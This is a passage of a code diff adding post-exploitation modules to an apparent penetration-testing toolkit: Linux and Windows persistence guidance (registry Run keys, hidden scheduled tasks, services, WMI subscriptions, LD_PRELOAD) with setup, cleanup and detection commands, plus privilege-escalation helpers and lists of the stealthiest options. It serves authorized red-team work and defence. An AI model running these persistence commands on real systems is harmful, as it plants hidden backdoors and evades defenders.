+        "gcc -shared -fPIC -o malicious.so malicious.c",
+      ],
+      cleanup: [
+        "# Remove from ld.so.preload",
+        "sed -i '/malicious.so/d' /etc/ld.so.preload",
+        "",
+        "# Remove environment variable",
+        "sed -i '/LD_PRELOAD/d' ~/.bashrc",
+        "",
+        "# Remove library",
+        "rm /path/to/malicious.so",
+      ],
+      detection: [
+        "cat /etc/ld.so.preload",
+        "env | grep LD_PRELOAD",
+        "ldd /bin/ls | grep -v '^\\t'",
+      ],
+    }
+  }
+
+  /**
+   * Create a persistence mechanism entry.
+   */
+  export function createMechanism(
+    category: PostExploitTypes.LinuxPersistenceCategory,
+    location: string,
+    options?: {
+      name?: string
+      description?: string
+    }
+  ): Omit<PostExploitTypes.PersistenceMechanism, "id" | "catalogedAt"> {
+    const commands = getMechanismCommands(category)
+
+    const defaults: Record<PostExploitTypes.LinuxPersistenceCategory, {
+      name: string
+      description: string
+      privilege: "user" | "admin" | "system"
+      survival: PostExploitTypes.Survival
+      detectionRisk: PostExploitTypes.DetectionRisk
+      mitre: string[]
+    }> = {
+      cron: {
+        name: "Cron Job",
+        description: "Scheduled task persistence via crontab",
+        privilege: "user",
+        survival: "reboot",
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PERSIST.CRON],
+      },
+      systemd: {
+        name: "Systemd Service",
+        description: "Persistence via systemd unit file",
+        privilege: "admin",
+        survival: "reboot",
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PERSIST.SYSTEMD],
+      },
+      init: {
+        name: "Init Script",
+        description: "SysV init script persistence",
+        privilege: "admin",
+        survival: "reboot",
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PERSIST.RC_SCRIPTS],
+      },
+      shell_profile: {
+        name: "Shell Profile",
+        description: "Backdoor in shell profile",
+        privilege: "user",
+        survival: "logout",
+        detectionRisk: "low",
+        mitre: [PostExploitTypes.MITRE_PERSIST.SHELL_PROFILE],
+      },
+      ssh_authorized_keys: {
+        name: "SSH Authorized Keys",
+        description: "SSH public key persistence",
+        privilege: "user",
+        survival: "reboot",
+        detectionRisk: "low",
+        mitre: [PostExploitTypes.MITRE_PERSIST.SSH_AUTHORIZED_KEYS],
+      },
+      ld_preload: {
+        name: "LD_PRELOAD",
+        description: "Library preload hijacking",
+        privilege: "admin",
+        survival: "reboot",
+        detectionRisk: "medium",
+        mitre: ["T1574.006"],
+      },
+      pam: {
+        name: "PAM Backdoor",
+        description: "PAM module backdoor",
+        privilege: "admin",
+        survival: "reboot",
+        detectionRisk: "low",
+        mitre: ["T1556.003"],
+      },
+      at_job: {
+        name: "At Job",
+        description: "One-time scheduled task",
+        privilege: "user",
+        survival: "reboot",
+        detectionRisk: "medium",
+        mitre: ["T1053.002"],
+      },
+      kernel_module: {
+        name: "Kernel Module",
+        description: "Malicious kernel module",
+        privilege: "admin",
+        survival: "reboot",
+        detectionRisk: "low",
+        mitre: ["T1547.006"],
+      },
+      rc_local: {
+        name: "RC Local",
+        description: "rc.local script persistence",
+        privilege: "admin",
+        survival: "reboot",
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PERSIST.RC_SCRIPTS],
+      },
+      motd: {
+        name: "MOTD Scripts",
+        description: "Message of the day script",
+        privilege: "admin",
+        survival: "logout",
+        detectionRisk: "low",
+        mitre: ["T1037"],
+      },
+      apt_hook: {
+        name: "APT Hook",
+        description: "APT package manager hook",
+        privilege: "admin",
+        survival: "service_restart",
+        detectionRisk: "low",
+        mitre: ["T1546"],
+      },
+    }
+
+    const def = defaults[category]
+
+    return {
+      category,
+      platform: "linux",
+      name: options?.name || def.name,
+      description: options?.description || def.description,
+      location,
+      privilege: def.privilege,
+      survival: def.survival,
+      detectionRisk: def.detectionRisk,
+      commands: commands.setup,
+      cleanup: commands.cleanup,
+      indicators: commands.detection,
+      mitre: def.mitre,
+    }
+  }
+
+  /**
+   * Get commands for a specific mechanism category.
+   */
+  function getMechanismCommands(category: PostExploitTypes.LinuxPersistenceCategory): {
+    setup: string[]
+    cleanup: string[]
+    detection: string[]
+  } {
+    switch (category) {
+      case "cron": return getCronCommands()
+      case "systemd": return getSystemdCommands()
+      case "shell_profile": return getShellProfileCommands()
+      case "ssh_authorized_keys": return getSSHKeysCommands()
+      case "ld_preload": return getLDPreloadCommands()
+      default: return { setup: [], cleanup: [], detection: [] }
+    }
+  }
+
+  /**
+   * Format persistence guidance for display.
+   */
+  export function formatGuidance(): string {
+    const lines: string[] = []
+    lines.push("LINUX PERSISTENCE GUIDANCE")
+    lines.push("==========================")
+    lines.push("")
+    lines.push("User-Level (no root required):")
+    lines.push("  - Cron job (crontab -e)")
+    lines.push("  - Shell profile (~/.bashrc)")
+    lines.push("  - SSH authorized_keys")
+    lines.push("  - User systemd service")
+    lines.push("")
+    lines.push("Root-Level:")
+    lines.push("  - System cron (/etc/cron.d/)")
+    lines.push("  - Systemd service (/etc/systemd/system/)")
+    lines.push("  - LD_PRELOAD (/etc/ld.so.preload)")
+    lines.push("  - PAM module")
+    lines.push("  - Kernel module")
+    lines.push("")
+    lines.push("Stealthiest Options:")
+    lines.push("  1. SSH authorized_keys (low detection)")
+    lines.push("  2. Shell profile modification (low detection)")
+    lines.push("  3. PAM backdoor (very low detection)")
+    lines.push("")
+    lines.push("Note: This is guidance for educational/authorized testing only.")
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/persistence/windows.ts b/packages/opencode/src/pentest/postexploit/persistence/windows.ts
new file mode 100644
index 00000000000..ea20afcc349
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/persistence/windows.ts
@@ -0,0 +1,422 @@
+/**
+ * @fileoverview Windows Persistence Guidance
+ *
+ * Provides guidance for Windows persistence mechanisms including
+ * registry, scheduled tasks, services, WMI, and more.
+ *
+ * @module pentest/postexploit/persistence/windows
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Windows persistence guidance namespace.
+ */
+export namespace WindowsPersistence {
+  /**
+   * Get registry Run key persistence commands.
+   */
+  export function getRegistryRunCommands(): {
+    setup: string[]
+    cleanup: string[]
+    detection: string[]
+  } {
+    return {
+      setup: [
+        "# User-level Run key (HKCU)",
+        'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "Update" /t REG_SZ /d "C:\\path\\to\\payload.exe" /f',
+        "",
+        "# System-level Run key (HKLM - requires admin)",
+        'reg add "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "Update" /t REG_SZ /d "C:\\path\\to\\payload.exe" /f',
+        "",
+        "# RunOnce (executes once then deleted)",
+        'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce" /v "Update" /t REG_SZ /d "C:\\path\\to\\payload.exe" /f',
+        "",
+        "# PowerShell alternative",
+        'Set-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" -Name "Update" -Value "C:\\path\\to\\payload.exe"',
+      ],
+      cleanup: [
+        '# Remove Run key entry',
+        'reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "Update" /f',
+        'reg delete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "Update" /f',
+        "",
+        "# PowerShell",
+        'Remove-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" -Name "Update"',
+      ],
+      detection: [
+        'reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"',
+        'reg query "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"',
+        "# Autoruns tool",
+        "autorunsc.exe -a r",
+      ],
+    }
+  }
+
+  /**
+   * Get scheduled task persistence commands.
+   */
+  export function getScheduledTaskCommands(): {
+    setup: string[]
+    cleanup: string[]
+    detection: string[]
+  } {
+    return {
+      setup: [
+        "# Basic scheduled task (at logon)",
+        'schtasks /create /tn "SystemUpdate" /tr "C:\\path\\to\\payload.exe" /sc onlogon /ru "%USERNAME%"',
+        "",
+        "# Run as SYSTEM (requires admin)",
+        'schtasks /create /tn "SystemUpdate" /tr "C:\\path\\to\\payload.exe" /sc onlogon /ru SYSTEM',
+        "",
+        "# Run at specific interval",
+        'schtasks /create /tn "SystemUpdate" /tr "C:\\path\\to\\payload.exe" /sc minute /mo 5',
+        "",
+        "# PowerShell",
+        '$action = New-ScheduledTaskAction -Execute "C:\\path\\to\\payload.exe"',
+        '$trigger = New-ScheduledTaskTrigger -AtLogon',
+        'Register-ScheduledTask -TaskName "SystemUpdate" -Action $action -Trigger $trigger',
+        "",
+        "# Hidden from Task Scheduler GUI (requires admin)",
+        "$task = Get-ScheduledTask -TaskName 'SystemUpdate'",
+        "$task.Settings.Hidden = $true",
+        "$task | Set-ScheduledTask",
+      ],
+      cleanup: [
+        '# Delete scheduled task',
+        'schtasks /delete /tn "SystemUpdate" /f',
+        "",
+        "# PowerShell",
+        'Unregister-ScheduledTask -TaskName "SystemUpdate" -Confirm:$false',
+      ],
+      detection: [
+        "schtasks /query /fo LIST /v",
+        "Get-ScheduledTask | Where-Object {$_.State -ne 'Disabled'}",
+        "# Event ID 4698 (task created)",
+        "# Event ID 4702 (task updated)",
+      ],
+    }
+  }
+
+  /**
+   * Get Windows service persistence commands.
+   */
+  export function getServiceCommands(): {
+    setup: string[]
+    cleanup: string[]
+    detection: string[]
+  } {
+    return {
+      setup: [
+        "# Create new service (requires admin)",
+        'sc create "SystemUpdate" binPath= "C:\\path\\to\\payload.exe" start= auto',
+        'sc description "SystemUpdate" "System Update Service"',
+        'sc start "SystemUpdate"',
+        "",
+        "# PowerShell",
+        'New-Service -Name "SystemUpdate" -BinaryPathName "C:\\path\\to\\payload.exe" -DisplayName "System Update" -StartupType Automatic',
+        'Start-Service -Name "SystemUpdate"',
+        "",
+        "# Service with arguments",
+        'sc create "SystemUpdate" binPath= "cmd.exe /c C:\\path\\to\\payload.exe" start= auto',
+      ],
+      cleanup: [
+        "# Stop and delete service",
+        'sc stop "SystemUpdate"',
+        'sc delete "SystemUpdate"',
+        "",
+        "# PowerShell",
+        'Stop-Service -Name "SystemUpdate" -Force',
+        'sc.exe delete "SystemUpdate"',
+      ],
+      detection: [
+        "sc query type= service state= all",
+        "Get-Service | Where-Object {$_.Status -eq 'Running'}",
+        "Get-WmiObject Win32_Service | Select Name, PathName, State",
+        "# Event ID 7045 (new service installed)",
+      ],
+    }
+  }
+
+  /**
+   * Get WMI event subscription persistence commands.
+   */
+  export function getWMICommands(): {
+    setup: string[]
+    cleanup: string[]
+    detection: string[]
+  } {
+    return {
+      setup: [
+        "# WMI Event Subscription (requires admin)",
+        "# PowerShell script to create WMI persistence",
+        "",
+        "# 1. Create Event Filter",
+        '$filterName = "SystemUpdateFilter"',
+        '$filterQuery = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA \'Win32_LocalTime\' AND TargetInstance.Hour = 12"',
+        "$filter = Set-WmiInstance -Namespace root\\subscription -Class __EventFilter -Arguments @{Name=$filterName; EventNamespace='root\\CIMV2'; QueryLanguage='WQL'; Query=$filterQuery}",
+        "",
+        "# 2. Create Command Consumer",
+        '$consumerName = "SystemUpdateConsumer"',
+        "$consumer = Set-WmiInstance -Namespace root\\subscription -Class CommandLineEventConsumer -Arguments @{Name=$consumerName; CommandLineTemplate='C:\\path\\to\\payload.exe'}",
+        "",
+        "# 3. Bind Filter to Consumer",
+        "Set-WmiInstance -Namespace root\\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$filter; Consumer=$consumer}",
+        "",
+        "# Alternative: Use ActiveScript consumer for PowerShell payload",
+      ],
+      cleanup: [
+        "# Remove WMI persistence (PowerShell)",
+        "Get-WmiObject -Namespace root\\subscription -Class __EventFilter | Where-Object {$_.Name -eq 'SystemUpdateFilter'} | Remove-WmiObject",
+        "Get-WmiObject -Namespace root\\subscription -Class CommandLineEventConsumer | Where-Object {$_.Name -eq 'SystemUpdateConsumer'} | Remove-WmiObject",
+        "Get-WmiObject -Namespace root\\subscription -Class __FilterToConsumerBinding | Where-Object {$_.Filter -like '*SystemUpdateFilter*'} | Remove-WmiObject",
+      ],
+      detection: [
+        "# List all WMI subscriptions",
+        "Get-WmiObject -Namespace root\\subscription -Class __EventFilter",
+        "Get-WmiObject -Namespace root\\subscription -Class __EventConsumer",
+        "Get-WmiObject -Namespace root\\subscription -Class __FilterToConsumerBinding",
+        "",
+        "# autoruns",
+        "autorunsc.exe -a w",
+      ],
+    }
+  }
+
+  /**
+   * Get startup folder persistence commands.
+   */
+  export function getStartupFolderCommands(): {
+    setup: string[]
+    cleanup: string[]
+    detection: string[]
+  } {
+    return {
+      setup: [
+        "# User Startup folder",
+        "copy C:\\path\\to\\payload.exe \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\"",
+        "",
+        "# Or create shortcut (LNK)",
+        "$WshShell = New-Object -comObject WScript.Shell",
+        '$Shortcut = $WshShell.CreateShortcut("$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Update.lnk")',
+        "$Shortcut.TargetPath = 'C:\\path\\to\\payload.exe'",
+        "$Shortcut.Save()",
+        "",
+        "# All Users Startup folder (requires admin)",
+        'copy C:\\path\\to\\payload.exe "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\"',
+      ],
+      cleanup: [
+        "# Remove from Startup folders",
+        'del "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe"',
+        'del "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Update.lnk"',
+        'del "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\payload.exe"',
+      ],
+      detection: [
+        'dir "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"',
+        'dir "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\"',
+        "Get-ChildItem -Path $env:APPDATA\\Microsoft\\Windows\\Start` Menu\\Programs\\Startup\\",
+      ],
+    }
+  }
+
+  /**
+   * Create a persistence mechanism entry.
+   */
+  export function createMechanism(
+    category: PostExploitTypes.WindowsPersistenceCategory,
+    location: string,
+    options?: {
+      name?: string
+      description?: string
+    }
+  ): Omit<PostExploitTypes.PersistenceMechanism, "id" | "catalogedAt"> {
+    const commands = getMechanismCommands(category)
+
+    const defaults: Record<PostExploitTypes.WindowsPersistenceCategory, {
+      name: string
+      description: string
+      privilege: "user" | "admin" | "system"
+      survival: PostExploitTypes.Survival
+      detectionRisk: PostExploitTypes.DetectionRisk
+      mitre: string[]
+    }> = {
+      registry_run: {
+        name: "Registry Run Key",
+        description: "Autostart via registry Run key",
+        privilege: "user",
+        survival: "reboot",
+        detectionRisk: "high",
+        mitre: [PostExploitTypes.MITRE_PERSIST.REGISTRY_RUN],
+      },
+      registry_services: {
+        name: "Registry Service",
+        description: "Service persistence via registry",
+        privilege: "admin",
+        survival: "reboot",
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PERSIST.SERVICE],
+      },
+      scheduled_task: {
+        name: "Scheduled Task",
+        description: "Windows Task Scheduler persistence",
+        privilege: "user",
+        survival: "reboot",
+        detectionRisk: "high",
+        mitre: [PostExploitTypes.MITRE_PERSIST.SCHEDULED_TASK],
+      },
+      wmi_subscription: {
+        name: "WMI Subscription",
+        description: "WMI event subscription persistence",
+        privilege: "admin",
+        survival: "reboot",
+        detectionRisk: "low",
+        mitre: [PostExploitTypes.MITRE_PERSIST.WMI_EVENT],
+      },
+      service: {
+        name: "Windows Service",
+        description: "Malicious Windows service",
+        privilege: "admin",
+        survival: "reboot",
+        detectionRisk: "high",
+        mitre: [PostExploitTypes.MITRE_PERSIST.SERVICE],
+      },
+      dll_hijack: {
+        name: "DLL Hijacking",
+        description: "DLL search order hijacking",
+        privilege: "user",
+        survival: "service_restart",
+        detectionRisk: "low",
+        mitre: ["T1574.001"],
+      },
+      com_hijack: {
+        name: "COM Hijacking",
+        description: "COM object hijacking",
+        privilege: "user",
+        survival: "service_restart",
+        detectionRisk: "low",
+        mitre: ["T1546.015"],
+      },
+      startup_folder: {
+        name: "Startup Folder",
+        description: "Startup folder persistence",
+        privilege: "user",
+        survival: "reboot",
+        detectionRisk: "high",
+        mitre: [PostExploitTypes.MITRE_PERSIST.STARTUP_FOLDER],
+      },
+      logon_script: {
+        name: "Logon Script",
+        description: "User logon script",
+        privilege: "admin",
+        survival: "logout",
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PERSIST.LOGON_SCRIPT],
+      },
+      bitsadmin: {
+        name: "BITS Job",
+        description: "BITS job persistence",
+        privilege: "user",
+        survival: "reboot",
+        detectionRisk: "medium",
+        mitre: ["T1197"],
+      },
+      image_hijack: {
+        name: "IFEO Hijacking",
+        description: "Image File Execution Options debugger",
+        privilege: "admin",
+        survival: "service_restart",
+        detectionRisk: "low",
+        mitre: ["T1546.012"],
+      },
+      accessibility_features: {
+        name: "Accessibility Features",
+        description: "Replace accessibility tools",
+        privilege: "admin",
+        survival: "reboot",
+        detectionRisk: "medium",
+        mitre: ["T1546.008"],
+      },
+      appinit_dlls: {
+        name: "AppInit DLLs",
+        description: "AppInit_DLLs registry persistence",
+        privilege: "admin",
+        survival: "reboot",
+        detectionRisk: "medium",
+        mitre: ["T1546.010"],
+      },
+      winlogon: {
+        name: "Winlogon",
+        description: "Winlogon helper persistence",
+        privilege: "admin",
+        survival: "logout",
+        detectionRisk: "low",
+        mitre: ["T1547.004"],
+      },
+    }
+
+    const def = defaults[category]
+
+    return {
+      category,
+      platform: "windows",
+      name: options?.name || def.name,
+      description: options?.description || def.description,
+      location,
+      privilege: def.privilege,
+      survival: def.survival,
+      detectionRisk: def.detectionRisk,
+      commands: commands.setup,
+      cleanup: commands.cleanup,
+      indicators: commands.detection,
+      mitre: def.mitre,
+    }
+  }
+
+  /**
+   * Get commands for a specific mechanism category.
+   */
+  function getMechanismCommands(category: PostExploitTypes.WindowsPersistenceCategory): {
+    setup: string[]
+    cleanup: string[]
+    detection: string[]
+  } {
+    switch (category) {
+      case "registry_run": return getRegistryRunCommands()
+      case "scheduled_task": return getScheduledTaskCommands()
+      case "service": return getServiceCommands()
+      case "wmi_subscription": return getWMICommands()
+      case "startup_folder": return getStartupFolderCommands()
+      default: return { setup: [], cleanup: [], detection: [] }
+    }
+  }
+
+  /**
+   * Format persistence guidance for display.
+   */
+  export function formatGuidance(): string {
+    const lines: string[] = []
+    lines.push("WINDOWS PERSISTENCE GUIDANCE")
+    lines.push("============================")
+    lines.push("")
+    lines.push("User-Level (no admin required):")
+    lines.push("  - Registry Run key (HKCU)")
+    lines.push("  - Scheduled task (user context)")
+    lines.push("  - Startup folder")
+    lines.push("  - COM hijacking")
+    lines.push("  - DLL hijacking (if writable path)")
+    lines.push("")
+    lines.push("Admin-Level:")
+    lines.push("  - Windows service")
+    lines.push("  - WMI event subscription")
+    lines.push("  - Scheduled task (SYSTEM)")
+    lines.push("  - Registry Run key (HKLM)")
+    lines.push("")
+    lines.push("Stealthiest Options:")
+    lines.push("  1. WMI event subscription (low detection)")
+    lines.push("  2. COM/DLL hijacking (low detection)")
+    lines.push("  3. IFEO debugger (low detection)")
+    lines.push("")
+    lines.push("Note: This is guidance for educational/authorized testing only.")
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/privesc/index.ts b/packages/opencode/src/pentest/postexploit/privesc/index.ts
new file mode 100644
index 00000000000..bfc489cdd05
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/privesc/index.ts
@@ -0,0 +1,328 @@
+/**
+ * @fileoverview Privilege Escalation Module
+ *
+ * Exports for Linux and Windows privilege escalation guidance.
+ *
+ * @module pentest/postexploit/privesc
+ */
+
+export { LinuxPrivesc } from "./linux"
+export { WindowsPrivesc } from "./windows"
+
+import { LinuxPrivesc } from "./linux"
+import { WindowsPrivesc } from "./windows"
+import { PostExploitTypes } from "../types"
+
+/**
+ * Unified privilege escalation interface.
+ */
+export namespace Privesc {
+  /**
+   * Get all discovery commands for a platform.
+   */
+  export function getDiscoveryCommands(platform: PostExploitTypes.Platform): Record<string, string[]> {
+    if (platform === "linux") {
+      return LinuxPrivesc.getAllDiscoveryCommands()
+    } else {
+      return WindowsPrivesc.getAllDiscoveryCommands()
+    }
+  }
+
+  /**
+   * Format a privesc vector for display.
+   */
+  export function formatVector(vector: PostExploitTypes.PrivescVector): string {
+    if (vector.platform === "linux") {
+      return LinuxPrivesc.formatVector(vector)
+    } else {
+      return WindowsPrivesc.formatVector(vector)
+    }
+  }
+
+  /**
+   * Format multiple vectors as a summary.
+   */
+  export function formatVectors(vectors: PostExploitTypes.PrivescVector[]): string {
+    return formatVectorSummary(vectors)
+  }
+
+  /**
+   * Format multiple vectors as a summary (alias).
+   */
+  export function formatVectorSummary(vectors: PostExploitTypes.PrivescVector[]): string {
+    if (vectors.length === 0) {
+      return "No privilege escalation vectors found."
+    }
+
+    const lines: string[] = []
+    lines.push(`Found ${vectors.length} privilege escalation vector(s):`)
+    lines.push("")
+
+    // Group by risk
+    const critical = vectors.filter(v => v.risk === "critical")
+    const high = vectors.filter(v => v.risk === "high")
+    const medium = vectors.filter(v => v.risk === "medium")
+    const low = vectors.filter(v => v.risk === "low")
+
+    if (critical.length > 0) {
+      lines.push(`[CRITICAL] (${critical.length})`)
+      for (const v of critical) {
+        lines.push(`  - ${v.name} (${v.category}) - ${v.exploitability}`)
+      }
+      lines.push("")
+    }
+
+    if (high.length > 0) {
+      lines.push(`[HIGH] (${high.length})`)
+      for (const v of high) {
+        lines.push(`  - ${v.name} (${v.category}) - ${v.exploitability}`)
+      }
+      lines.push("")
+    }
+
+    if (medium.length > 0) {
+      lines.push(`[MEDIUM] (${medium.length})`)
+      for (const v of medium) {
+        lines.push(`  - ${v.name} (${v.category}) - ${v.exploitability}`)
+      }
+      lines.push("")
+    }
+
+    if (low.length > 0) {
+      lines.push(`[LOW] (${low.length})`)
+      for (const v of low) {
+        lines.push(`  - ${v.name} (${v.category}) - ${v.exploitability}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Get common exploitation tools for a platform.
+   */
+  export function getTools(platform: PostExploitTypes.Platform): string[] {
+    if (platform === "linux") {
+      return [
+        "LinPEAS - Linux Privilege Escalation Awesome Script",
+        "pspy - Monitor processes without root",
+        "linux-exploit-suggester - Suggest kernel exploits",
+        "GTFOBins - Unix binaries exploitation",
+      ]
+    } else {
+      return [
+        "WinPEAS - Windows Privilege Escalation Awesome Script",
+        "PowerUp - PowerShell privesc checks",
+        "BeRoot - Automated privesc scanner",
+        "Seatbelt - Security-relevant system info",
+        "SharpUp - C# port of PowerUp",
+        "Rubeus - Kerberos abuse toolkit",
+        "JuicyPotato/PrintSpoofer - Token impersonation",
+        "LOLBAS - Living Off The Land Binaries",
+      ]
+    }
+  }
+
+  /**
+   * Get quick win checks for a platform.
+   */
+  export function getQuickWinChecks(platform: PostExploitTypes.Platform): string[] {
+    if (platform === "linux") {
+      return [
+        "sudo -l (check sudo permissions)",
+        "find / -perm -u=s -type f 2>/dev/null (SUID binaries)",
+        "getcap -r / 2>/dev/null (capabilities)",
+        "cat /etc/crontab (cron jobs)",
+        "ls -la /etc/passwd /etc/shadow (file permissions)",
+        "uname -a (kernel version)",
+        "cat /etc/*-release (distribution)",
+      ]
+    } else {
+      return [
+        "whoami /priv (token privileges)",
+        "whoami /groups (group memberships)",
+        "wmic service get name,pathname (service paths)",
+        "reg query HKLM\\...\\Installer /v AlwaysInstallElevated",
+        "schtasks /query /fo LIST /v (scheduled tasks)",
+        "netstat -ano (network connections)",
+        "cmdkey /list (stored credentials)",
+      ]
+    }
+  }
+
+  // ============================================
+  // Linux-specific guidance functions
+  // ============================================
+
+  /**
+   * Get SUID binary exploitation guidance.
+   */
+  export function getSUIDBinaryInfo(): Array<{
+    name: string
+    description: string
+    risk: PostExploitTypes.Severity
+    exploitability: PostExploitTypes.Exploitability
+    technique: string
+    commands: string[]
+    detectionRisk: PostExploitTypes.DetectionRisk
+    gtfobins?: string
+    mitre: string[]
+  }> {
+    return Object.entries(LinuxPrivesc.SUID_PRIVESC_BINARIES).map(([name, binary]) => ({
+      name,
+      description: `SUID binary ${name} can be exploited via ${binary.technique}`,
+      risk: "high" as PostExploitTypes.Severity,
+      exploitability: "easy" as PostExploitTypes.Exploitability,
+      technique: binary.technique,
+      commands: binary.commands,
+      detectionRisk: "medium" as PostExploitTypes.DetectionRisk,
+      gtfobins: binary.gtfobins,
+      mitre: ["T1548.001"], // Abuse Elevation Control Mechanism: Setuid and Setgid
+    }))
+  }
+
+  /**
+   * Get sudo misconfiguration guidance.
+   */
+  export function getSudoInfo(): Array<{
+    name: string
+    description: string
+    risk: PostExploitTypes.Severity
+    exploitability: PostExploitTypes.Exploitability
+    technique: string
+    commands: string[]
+    detectionRisk: PostExploitTypes.DetectionRisk
+    gtfobins?: string
+    mitre: string[]
+  }> {
+    return Object.entries(LinuxPrivesc.SUDO_EXPLOITS).map(([pattern, exploit]) => ({
+      name: pattern,
+      description: `Sudo misconfiguration allowing ${exploit.technique}`,
+      risk: pattern === "ALL" ? "critical" as PostExploitTypes.Severity : "high" as PostExploitTypes.Severity,
+      exploitability: "easy" as PostExploitTypes.Exploitability,
+      technique: exploit.technique,
+      commands: exploit.commands,
+      detectionRisk: "low" as PostExploitTypes.DetectionRisk,
+      gtfobins: exploit.gtfobins,
+      mitre: ["T1548.003"], // Abuse Elevation Control Mechanism: Sudo and Sudo Caching
+    }))
+  }
+
+  /**
+   * Get kernel exploit guidance (returns capabilities for Linux).
+   */
+  export function getKernelExploits(platform: PostExploitTypes.Platform): Array<{
+    name: string
+    description: string
+    risk: PostExploitTypes.Severity
+    exploitability: PostExploitTypes.Exploitability
+    technique: string
+    commands: string[]
+    prerequisites: string[]
+    detectionRisk: PostExploitTypes.DetectionRisk
+    targetKernels: string[]
+    mitre: string[]
+  }> {
+    if (platform === "linux") {
+      // Return capability exploits as kernel-level exploits
+      return Object.entries(LinuxPrivesc.CAPABILITY_EXPLOITS).map(([cap, exploit]) => ({
+        name: `Capability: ${exploit.capability}`,
+        description: `Linux capability ${exploit.capability} allows ${exploit.technique}`,
+        risk: "high" as PostExploitTypes.Severity,
+        exploitability: "moderate" as PostExploitTypes.Exploitability,
+        technique: exploit.technique,
+        commands: exploit.commands,
+        prerequisites: [`Binary with ${cap} capability`],
+        detectionRisk: "medium" as PostExploitTypes.DetectionRisk,
+        targetKernels: ["2.6.x", "3.x", "4.x", "5.x", "6.x"],
+        mitre: ["T1068"], // Exploitation for Privilege Escalation
+      }))
+    }
+    return []
+  }
+
+  // ============================================
+  // Windows-specific guidance functions
+  // ============================================
+
+  /**
+   * Get Windows service exploitation guidance.
+   */
+  export function getServiceInfo(): Array<{
+    name: string
+    description: string
+    risk: PostExploitTypes.Severity
+    exploitability: PostExploitTypes.Exploitability
+    technique: string
+    commands: string[]
+    detectionRisk: PostExploitTypes.DetectionRisk
+    lolbas?: string
+    mitre: string[]
+  }> {
+    return Object.entries(WindowsPrivesc.SERVICE_EXPLOITS).map(([type, vuln]) => ({
+      name: type,
+      description: vuln.vulnerability,
+      risk: "high" as PostExploitTypes.Severity,
+      exploitability: "moderate" as PostExploitTypes.Exploitability,
+      technique: vuln.technique,
+      commands: vuln.commands,
+      detectionRisk: "medium" as PostExploitTypes.DetectionRisk,
+      lolbas: vuln.lolbas,
+      mitre: ["T1574.009", "T1574.010"], // Hijack Execution Flow: Path Interception, Services File Permissions Weakness
+    }))
+  }
+
+  /**
+   * Get Windows token privilege exploitation guidance.
+   */
+  export function getTokenInfo(): Array<{
+    name: string
+    description: string
+    risk: PostExploitTypes.Severity
+    exploitability: PostExploitTypes.Exploitability
+    technique: string
+    commands: string[]
+    detectionRisk: PostExploitTypes.DetectionRisk
+    mitre: string[]
+  }> {
+    return Object.entries(WindowsPrivesc.TOKEN_EXPLOITS).map(([priv, exploit]) => ({
+      name: exploit.privilege,
+      description: `${exploit.privilege} privilege enables ${exploit.technique}`,
+      risk: priv === "SeImpersonatePrivilege" || priv === "SeDebugPrivilege" ? "critical" as PostExploitTypes.Severity : "high" as PostExploitTypes.Severity,
+      exploitability: "easy" as PostExploitTypes.Exploitability,
+      technique: exploit.technique,
+      commands: exploit.commands,
+      detectionRisk: "medium" as PostExploitTypes.DetectionRisk,
+      mitre: ["T1134"], // Access Token Manipulation
+    }))
+  }
+
+  /**
+   * Get UAC bypass guidance.
+   */
+  export function getUACBypassInfo(): Array<{
+    name: string
+    description: string
+    risk: PostExploitTypes.Severity
+    exploitability: PostExploitTypes.Exploitability
+    technique: string
+    commands: string[]
+    prerequisites: string[]
+    detectionRisk: PostExploitTypes.DetectionRisk
+    binary: string
+    mitre: string[]
+  }> {
+    return Object.entries(WindowsPrivesc.UAC_BYPASSES).map(([key, bypass]) => ({
+      name: bypass.name,
+      description: `UAC bypass using ${bypass.technique}`,
+      risk: "high" as PostExploitTypes.Severity,
+      exploitability: "easy" as PostExploitTypes.Exploitability,
+      technique: bypass.technique,
+      commands: bypass.commands,
+      prerequisites: [`Local admin on ${bypass.windowsVersions.join(", ")}`],
+      detectionRisk: "medium" as PostExploitTypes.DetectionRisk,
+      binary: key,
+      mitre: ["T1548.002"], // Abuse Elevation Control Mechanism: Bypass User Account Control
+    }))
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/privesc/linux.ts b/packages/opencode/src/pentest/postexploit/privesc/linux.ts
new file mode 100644
index 00000000000..8a4b3ea215e
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/privesc/linux.ts
